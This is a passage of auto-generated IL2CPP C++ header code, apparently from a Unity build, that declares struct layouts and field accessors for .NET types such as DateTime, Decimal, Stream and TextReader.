{ public: // System.Char System.Char::m_value Il2CppChar ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9, ___m_value_0)); } inline Il2CppChar get_m_value_0() const { return ___m_value_0; } inline Il2CppChar* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(Il2CppChar value) { ___m_value_0 = value; } }; struct Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_StaticFields { public: // System.Byte[] System.Char::categoryForLatin1 ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___categoryForLatin1_3; public: inline static int32_t get_offset_of_categoryForLatin1_3() { return static_cast<int32_t>(offsetof(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_StaticFields, ___categoryForLatin1_3)); } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* get_categoryForLatin1_3() const { return ___categoryForLatin1_3; } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** get_address_of_categoryForLatin1_3() { return &___categoryForLatin1_3; } inline void set_categoryForLatin1_3(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* value) { ___categoryForLatin1_3 = value; Il2CppCodeGenWriteBarrier((&___categoryForLatin1_3), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CHAR_TBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_H #ifndef DICTIONARYENTRY_TB5348A26B94274FCC1DD77185BD5946E283B11A4_H #define DICTIONARYENTRY_TB5348A26B94274FCC1DD77185BD5946E283B11A4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Collections.DictionaryEntry struct DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4 { public: // System.Object System.Collections.DictionaryEntry::_key RuntimeObject * ____key_0; // System.Object System.Collections.DictionaryEntry::_value RuntimeObject * ____value_1; public: inline static int32_t get_offset_of__key_0() { return static_cast<int32_t>(offsetof(DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4, ____key_0)); } inline RuntimeObject * get__key_0() const { return ____key_0; } inline RuntimeObject ** get_address_of__key_0() { return &____key_0; } inline void set__key_0(RuntimeObject * value) { ____key_0 = value; Il2CppCodeGenWriteBarrier((&____key_0), value); } inline static int32_t get_offset_of__value_1() { return static_cast<int32_t>(offsetof(DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4, ____value_1)); } inline RuntimeObject * get__value_1() const { return ____value_1; } inline RuntimeObject ** get_address_of__value_1() { return &____value_1; } inline void set__value_1(RuntimeObject * value) { ____value_1 = value; Il2CppCodeGenWriteBarrier((&____value_1), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.Collections.DictionaryEntry struct DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4_marshaled_pinvoke { Il2CppIUnknown* ____key_0; Il2CppIUnknown* ____value_1; }; // Native definition for COM marshalling of System.Collections.DictionaryEntry struct DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4_marshaled_com { Il2CppIUnknown* ____key_0; Il2CppIUnknown* ____value_1; }; #endif // DICTIONARYENTRY_TB5348A26B94274FCC1DD77185BD5946E283B11A4_H #ifndef CONTEXTBOUNDOBJECT_TB24722752964E8FCEB9E1E4F6707FA88DFA0DFF0_H #define CONTEXTBOUNDOBJECT_TB24722752964E8FCEB9E1E4F6707FA88DFA0DFF0_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ContextBoundObject struct ContextBoundObject_tB24722752964E8FCEB9E1E4F6707FA88DFA0DFF0 : public MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONTEXTBOUNDOBJECT_TB24722752964E8FCEB9E1E4F6707FA88DFA0DFF0_H #ifndef CONTEXTSTATICATTRIBUTE_TDE78CF42C2CA6949E7E99D3E63D35003A0660AA6_H #define CONTEXTSTATICATTRIBUTE_TDE78CF42C2CA6949E7E99D3E63D35003A0660AA6_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ContextStaticAttribute struct ContextStaticAttribute_tDE78CF42C2CA6949E7E99D3E63D35003A0660AA6 : public Attribute_tF048C13FB3C8CFCC53F82290E4A3F621089F9A74 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONTEXTSTATICATTRIBUTE_TDE78CF42C2CA6949E7E99D3E63D35003A0660AA6_H #ifndef COORD_T6CEFF682745DD47B1B4DA3ED268C0933021AC34A_H #define COORD_T6CEFF682745DD47B1B4DA3ED268C0933021AC34A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Coord struct Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A { public: // System.Int16 System.Coord::X int16_t ___X_0; // System.Int16 System.Coord::Y int16_t ___Y_1; public: inline static int32_t get_offset_of_X_0() { return static_cast<int32_t>(offsetof(Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A, ___X_0)); } inline int16_t get_X_0() const { return ___X_0; } inline int16_t* get_address_of_X_0() { return &___X_0; } inline void set_X_0(int16_t value) { ___X_0 = value; } inline static int32_t get_offset_of_Y_1() { return static_cast<int32_t>(offsetof(Coord_t6CEFF682745DD47B1B4DA3ED268C0933021AC34A, ___Y_1)); } inline int16_t get_Y_1() const { return ___Y_1; } inline int16_t* get_address_of_Y_1() { return &___Y_1; } inline void set_Y_1(int16_t value) { ___Y_1 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // COORD_T6CEFF682745DD47B1B4DA3ED268C0933021AC34A_H #ifndef CURRENTSYSTEMTIMEZONE_T7689B8BF1C4A474BD3CFA5B8E89FA84A53D44171_H #define CURRENTSYSTEMTIMEZONE_T7689B8BF1C4A474BD3CFA5B8E89FA84A53D44171_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.CurrentSystemTimeZone struct CurrentSystemTimeZone_t7689B8BF1C4A474BD3CFA5B8E89FA84A53D44171 : public TimeZone_tA2DF435DA1A379978B885F0872A93774666B7454 { public: // System.TimeZoneInfo System.CurrentSystemTimeZone::LocalTimeZone TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * ___LocalTimeZone_1; public: inline static int32_t get_offset_of_LocalTimeZone_1() { return static_cast<int32_t>(offsetof(CurrentSystemTimeZone_t7689B8BF1C4A474BD3CFA5B8E89FA84A53D44171, ___LocalTimeZone_1)); } inline TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * get_LocalTimeZone_1() const { return ___LocalTimeZone_1; } inline TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 ** get_address_of_LocalTimeZone_1() { return &___LocalTimeZone_1; } inline void set_LocalTimeZone_1(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * value) { ___LocalTimeZone_1 = value; Il2CppCodeGenWriteBarrier((&___LocalTimeZone_1), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CURRENTSYSTEMTIMEZONE_T7689B8BF1C4A474BD3CFA5B8E89FA84A53D44171_H #ifndef DATETIME_T349B7449FBAAFF4192636E2B7A07694DA9236132_H #define DATETIME_T349B7449FBAAFF4192636E2B7A07694DA9236132_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTime struct DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 { public: // System.UInt64 System.DateTime::dateData uint64_t ___dateData_44; public: inline static int32_t get_offset_of_dateData_44() { return static_cast<int32_t>(offsetof(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132, ___dateData_44)); } inline uint64_t get_dateData_44() const { return ___dateData_44; } inline uint64_t* get_address_of_dateData_44() { return &___dateData_44; } inline void set_dateData_44(uint64_t value) { ___dateData_44 = value; } }; struct DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields { public: // System.Int32[] System.DateTime::DaysToMonth365 Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* ___DaysToMonth365_29; // System.Int32[] System.DateTime::DaysToMonth366 Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* ___DaysToMonth366_30; // System.DateTime System.DateTime::MinValue DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___MinValue_31; // System.DateTime System.DateTime::MaxValue DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___MaxValue_32; public: inline static int32_t get_offset_of_DaysToMonth365_29() { return static_cast<int32_t>(offsetof(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields, ___DaysToMonth365_29)); } inline Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* get_DaysToMonth365_29() const { return ___DaysToMonth365_29; } inline Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83** get_address_of_DaysToMonth365_29() { return &___DaysToMonth365_29; } inline void set_DaysToMonth365_29(Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* value) { ___DaysToMonth365_29 = value; Il2CppCodeGenWriteBarrier((&___DaysToMonth365_29), value); } inline static int32_t get_offset_of_DaysToMonth366_30() { return static_cast<int32_t>(offsetof(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields, ___DaysToMonth366_30)); } inline Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* get_DaysToMonth366_30() const { return ___DaysToMonth366_30; } inline Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83** get_address_of_DaysToMonth366_30() { return &___DaysToMonth366_30; } inline void set_DaysToMonth366_30(Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* value) { ___DaysToMonth366_30 = value; Il2CppCodeGenWriteBarrier((&___DaysToMonth366_30), value); } inline static int32_t get_offset_of_MinValue_31() { return static_cast<int32_t>(offsetof(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields, ___MinValue_31)); } inline DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 get_MinValue_31() const { return ___MinValue_31; } inline DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * get_address_of_MinValue_31() { return &___MinValue_31; } inline void set_MinValue_31(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 value) { ___MinValue_31 = value; } inline static int32_t get_offset_of_MaxValue_32() { return static_cast<int32_t>(offsetof(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields, ___MaxValue_32)); } inline DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 get_MaxValue_32() const { return ___MaxValue_32; } inline DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * get_address_of_MaxValue_32() { return &___MaxValue_32; } inline void set_MaxValue_32(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 value) { ___MaxValue_32 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DATETIME_T349B7449FBAAFF4192636E2B7A07694DA9236132_H #ifndef DECIMAL_T44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_H #define DECIMAL_T44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Decimal struct Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 { public: // System.Int32 System.Decimal::flags int32_t ___flags_14; // System.Int32 System.Decimal::hi int32_t ___hi_15; // System.Int32 System.Decimal::lo int32_t ___lo_16; // System.Int32 System.Decimal::mid int32_t ___mid_17; public: inline static int32_t get_offset_of_flags_14() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8, ___flags_14)); } inline int32_t get_flags_14() const { return ___flags_14; } inline int32_t* get_address_of_flags_14() { return &___flags_14; } inline void set_flags_14(int32_t value) { ___flags_14 = value; } inline static int32_t get_offset_of_hi_15() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8, ___hi_15)); } inline int32_t get_hi_15() const { return ___hi_15; } inline int32_t* get_address_of_hi_15() { return &___hi_15; } inline void set_hi_15(int32_t value) { ___hi_15 = value; } inline static int32_t get_offset_of_lo_16() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8, ___lo_16)); } inline int32_t get_lo_16() const { return ___lo_16; } inline int32_t* get_address_of_lo_16() { return &___lo_16; } inline void set_lo_16(int32_t value) { ___lo_16 = value; } inline static int32_t get_offset_of_mid_17() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8, ___mid_17)); } inline int32_t get_mid_17() const { return ___mid_17; } inline int32_t* get_address_of_mid_17() { return &___mid_17; } inline void set_mid_17(int32_t value) { ___mid_17 = value; } }; struct Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields { public: // System.UInt32[] System.Decimal::Powers10 UInt32U5BU5D_t9AA834AF2940E75BBF8E3F08FF0D20D266DB71CB* ___Powers10_6; // System.Decimal System.Decimal::Zero Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___Zero_7; // System.Decimal System.Decimal::One Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___One_8; // System.Decimal System.Decimal::MinusOne Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___MinusOne_9; // System.Decimal System.Decimal::MaxValue Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___MaxValue_10; // System.Decimal System.Decimal::MinValue Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___MinValue_11; // System.Decimal System.Decimal::NearNegativeZero Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___NearNegativeZero_12; // System.Decimal System.Decimal::NearPositiveZero Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___NearPositiveZero_13; public: inline static int32_t get_offset_of_Powers10_6() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields, ___Powers10_6)); } inline UInt32U5BU5D_t9AA834AF2940E75BBF8E3F08FF0D20D266DB71CB* get_Powers10_6() const { return ___Powers10_6; } inline UInt32U5BU5D_t9AA834AF2940E75BBF8E3F08FF0D20D266DB71CB** get_address_of_Powers10_6() { return &___Powers10_6; } inline void set_Powers10_6(UInt32U5BU5D_t9AA834AF2940E75BBF8E3F08FF0D20D266DB71CB* value) { ___Powers10_6 = value; Il2CppCodeGenWriteBarrier((&___Powers10_6), value); } inline static int32_t get_offset_of_Zero_7() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields, ___Zero_7)); } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 get_Zero_7() const { return ___Zero_7; } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 * get_address_of_Zero_7() { return &___Zero_7; } inline void set_Zero_7(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 value) { ___Zero_7 = value; } inline static int32_t get_offset_of_One_8() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields, ___One_8)); } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 get_One_8() const { return ___One_8; } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 * get_address_of_One_8() { return &___One_8; } inline void set_One_8(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 value) { ___One_8 = value; } inline static int32_t get_offset_of_MinusOne_9() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields, ___MinusOne_9)); } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 get_MinusOne_9() const { return ___MinusOne_9; } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 * get_address_of_MinusOne_9() { return &___MinusOne_9; } inline void set_MinusOne_9(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 value) { ___MinusOne_9 = value; } inline static int32_t get_offset_of_MaxValue_10() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields, ___MaxValue_10)); } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 get_MaxValue_10() const { return ___MaxValue_10; } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 * get_address_of_MaxValue_10() { return &___MaxValue_10; } inline void set_MaxValue_10(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 value) { ___MaxValue_10 = value; } inline static int32_t get_offset_of_MinValue_11() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields, ___MinValue_11)); } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 get_MinValue_11() const { return ___MinValue_11; } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 * get_address_of_MinValue_11() { return &___MinValue_11; } inline void set_MinValue_11(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 value) { ___MinValue_11 = value; } inline static int32_t get_offset_of_NearNegativeZero_12() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields, ___NearNegativeZero_12)); } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 get_NearNegativeZero_12() const { return ___NearNegativeZero_12; } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 * get_address_of_NearNegativeZero_12() { return &___NearNegativeZero_12; } inline void set_NearNegativeZero_12(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 value) { ___NearNegativeZero_12 = value; } inline static int32_t get_offset_of_NearPositiveZero_13() { return static_cast<int32_t>(offsetof(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields, ___NearPositiveZero_13)); } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 get_NearPositiveZero_13() const { return ___NearPositiveZero_13; } inline Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 * get_address_of_NearPositiveZero_13() { return &___NearPositiveZero_13; } inline void set_NearPositiveZero_13(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 value) { ___NearPositiveZero_13 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DECIMAL_T44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_H #ifndef DOUBLE_T358B8F23BDC52A5DD700E727E204F9F7CDE12409_H #define DOUBLE_T358B8F23BDC52A5DD700E727E204F9F7CDE12409_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Double struct Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409 { public: // System.Double System.Double::m_value double ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409, ___m_value_0)); } inline double get_m_value_0() const { return ___m_value_0; } inline double* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(double value) { ___m_value_0 = value; } }; struct Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_StaticFields { public: // System.Double System.Double::NegativeZero double ___NegativeZero_7; public: inline static int32_t get_offset_of_NegativeZero_7() { return static_cast<int32_t>(offsetof(Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_StaticFields, ___NegativeZero_7)); } inline double get_NegativeZero_7() const { return ___NegativeZero_7; } inline double* get_address_of_NegativeZero_7() { return &___NegativeZero_7; } inline void set_NegativeZero_7(double value) { ___NegativeZero_7 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DOUBLE_T358B8F23BDC52A5DD700E727E204F9F7CDE12409_H #ifndef ENUM_T2AF27C02B8653AE29442467390005ABC74D8F521_H #define ENUM_T2AF27C02B8653AE29442467390005ABC74D8F521_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Enum struct Enum_t2AF27C02B8653AE29442467390005ABC74D8F521 : public ValueType_t4D0C27076F7C36E76190FB3328E232BCB1CD1FFF { public: public: }; struct Enum_t2AF27C02B8653AE29442467390005ABC74D8F521_StaticFields { public: // System.Char[] System.Enum::enumSeperatorCharArray CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___enumSeperatorCharArray_0; public: inline static int32_t get_offset_of_enumSeperatorCharArray_0() { return static_cast<int32_t>(offsetof(Enum_t2AF27C02B8653AE29442467390005ABC74D8F521_StaticFields, ___enumSeperatorCharArray_0)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_enumSeperatorCharArray_0() const { return ___enumSeperatorCharArray_0; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_enumSeperatorCharArray_0() { return &___enumSeperatorCharArray_0; } inline void set_enumSeperatorCharArray_0(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___enumSeperatorCharArray_0 = value; Il2CppCodeGenWriteBarrier((&___enumSeperatorCharArray_0), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.Enum struct Enum_t2AF27C02B8653AE29442467390005ABC74D8F521_marshaled_pinvoke { }; // Native definition for COM marshalling of System.Enum struct Enum_t2AF27C02B8653AE29442467390005ABC74D8F521_marshaled_com { }; #endif // ENUM_T2AF27C02B8653AE29442467390005ABC74D8F521_H #ifndef STREAM_TFC50657DD5AAB87770987F9179D934A51D99D5E7_H #define STREAM_TFC50657DD5AAB87770987F9179D934A51D99D5E7_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.Stream struct Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 : public MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF { public: // System.IO.Stream/ReadWriteTask System.IO.Stream::_activeReadWriteTask ReadWriteTask_tFA17EEE8BC5C4C83EAEFCC3662A30DE351ABAA80 * ____activeReadWriteTask_2; // System.Threading.SemaphoreSlim System.IO.Stream::_asyncActiveSemaphore SemaphoreSlim_t2E2888D1C0C8FAB80823C76F1602E4434B8FA048 * ____asyncActiveSemaphore_3; public: inline static int32_t get_offset_of__activeReadWriteTask_2() { return static_cast<int32_t>(offsetof(Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7, ____activeReadWriteTask_2)); } inline ReadWriteTask_tFA17EEE8BC5C4C83EAEFCC3662A30DE351ABAA80 * get__activeReadWriteTask_2() const { return ____activeReadWriteTask_2; } inline ReadWriteTask_tFA17EEE8BC5C4C83EAEFCC3662A30DE351ABAA80 ** get_address_of__activeReadWriteTask_2() { return &____activeReadWriteTask_2; } inline void set__activeReadWriteTask_2(ReadWriteTask_tFA17EEE8BC5C4C83EAEFCC3662A30DE351ABAA80 * value) { ____activeReadWriteTask_2 = value; Il2CppCodeGenWriteBarrier((&____activeReadWriteTask_2), value); } inline static int32_t get_offset_of__asyncActiveSemaphore_3() { return static_cast<int32_t>(offsetof(Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7, ____asyncActiveSemaphore_3)); } inline SemaphoreSlim_t2E2888D1C0C8FAB80823C76F1602E4434B8FA048 * get__asyncActiveSemaphore_3() const { return ____asyncActiveSemaphore_3; } inline SemaphoreSlim_t2E2888D1C0C8FAB80823C76F1602E4434B8FA048 ** get_address_of__asyncActiveSemaphore_3() { return &____asyncActiveSemaphore_3; } inline void set__asyncActiveSemaphore_3(SemaphoreSlim_t2E2888D1C0C8FAB80823C76F1602E4434B8FA048 * value) { ____asyncActiveSemaphore_3 = value; Il2CppCodeGenWriteBarrier((&____asyncActiveSemaphore_3), value); } }; struct Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7_StaticFields { public: // System.IO.Stream System.IO.Stream::Null Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * ___Null_1; public: inline static int32_t get_offset_of_Null_1() { return static_cast<int32_t>(offsetof(Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7_StaticFields, ___Null_1)); } inline Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * get_Null_1() const { return ___Null_1; } inline Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 ** get_address_of_Null_1() { return &___Null_1; } inline void set_Null_1(Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * value) { ___Null_1 = value; Il2CppCodeGenWriteBarrier((&___Null_1), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STREAM_TFC50657DD5AAB87770987F9179D934A51D99D5E7_H #ifndef TEXTREADER_T7DF8314B601D202ECFEDF623093A87BFDAB58D0A_H #define TEXTREADER_T7DF8314B601D202ECFEDF623093A87BFDAB58D0A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.TextReader struct TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A : public MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF { public: public: }; struct TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A_StaticFields { public: // System.Func`2<System.Object,System.String> System.IO.TextReader::_ReadLineDelegate Func_2_t44B347E67E515867D995E8BD5EFD67FA88CE53CF * ____ReadLineDelegate_1; // System.Func`2<System.Object,System.Int32> System.IO.TextReader::_ReadDelegate Func_2_t8B2DA3FB30280CE3D92F50E9CCAACEE4828789A6 * ____ReadDelegate_2; // System.IO.TextReader System.IO.TextReader::Null TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * ___Null_3; public: inline static int32_t get_offset_of__ReadLineDelegate_1() { return static_cast<int32_t>(offsetof(TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A_StaticFields, ____ReadLineDelegate_1)); } inline Func_2_t44B347E67E515867D995E8BD5EFD67FA88CE53CF * get__ReadLineDelegate_1() const { return ____ReadLineDelegate_1; } inline Func_2_t44B347E67E515867D995E8BD5EFD67FA88CE53CF ** get_address_of__ReadLineDelegate_1() { return &____ReadLineDelegate_1; } inline void set__ReadLineDelegate_1(Func_2_t44B347E67E515867D995E8BD5EFD67FA88CE53CF * value) { ____ReadLineDelegate_1 = value; Il2CppCodeGenWriteBarrier((&____ReadLineDelegate_1), value); } inline static int32_t get_offset_of__ReadDelegate_2() { return static_cast<int32_t>(offsetof(TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A_StaticFields, ____ReadDelegate_2)); } inline Func_2_t8B2DA3FB30280CE3D92F50E9CCAACEE4828789A6 * get__ReadDelegate_2() const { return ____ReadDelegate_2; } inline Func_2_t8B2DA3FB30280CE3D92F50E9CCAACEE4828789A6 ** get_address_of__ReadDelegate_2() { return &____ReadDelegate_2; } inline void set__ReadDelegate_2(Func_2_t8B2DA3FB30280CE3D92F50E9CCAACEE4828789A6 * value) { ____ReadDelegate_2 = value; Il2CppCodeGenWriteBarrier((&____ReadDelegate_2), value); } inline static int32_t get_offset_of_Null_3() { return static_cast<int32_t>(offsetof(TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A_StaticFields, ___Null_3)); } inline TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * get_Null_3() const { return ___Null_3; } inline TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A ** get_address_of_Null_3() { return &___Null_3; } inline void set_Null_3(TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A * value) { ___Null_3 = value; Il2CppCodeGenWriteBarrier((&___Null_3), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TEXTREADER_T7DF8314B601D202ECFEDF623093A87BFDAB58D0A_H #ifndef TEXTWRITER_T92451D929322093838C41489883D5B2D7ABAF3F0_H #define TEXTWRITER_T92451D929322093838C41489883D5B2D7ABAF3F0_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.TextWriter struct 